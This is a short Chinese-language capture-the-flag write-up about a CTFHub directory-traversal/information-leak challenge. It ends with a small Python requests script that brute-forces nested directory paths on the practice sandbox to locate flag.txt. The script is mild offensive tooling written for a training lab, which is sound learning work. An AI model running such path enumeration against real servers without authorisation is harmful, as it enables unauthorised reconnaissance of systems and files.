ctfhub技能樹—信息泄露—目錄遍歷


打開靶機

 

 

 查看頁面

 

 

 點擊后發現幾個目錄

 

 

 於是開始查找

 

 在2/1目錄下發現flag.txt

成功拿到flag

 

 

練習一下最近學習的requests庫

附上源碼

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests

url = "http://challenge-a2aa3d58b775fdfd.sandbox.ctfhub.com:10080/flag_in_here"

for i in range(5):
    for j in range(5):
        url_test =url+"/"+str(i)+"/"+str(j)
        r = requests.get(url_test)
        r.encoding = 'utf-8'
        get_file=r.text
        if "flag.txt" in get_file:
            print(url_test)

運行后即可拿到flag.txt所在路徑

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM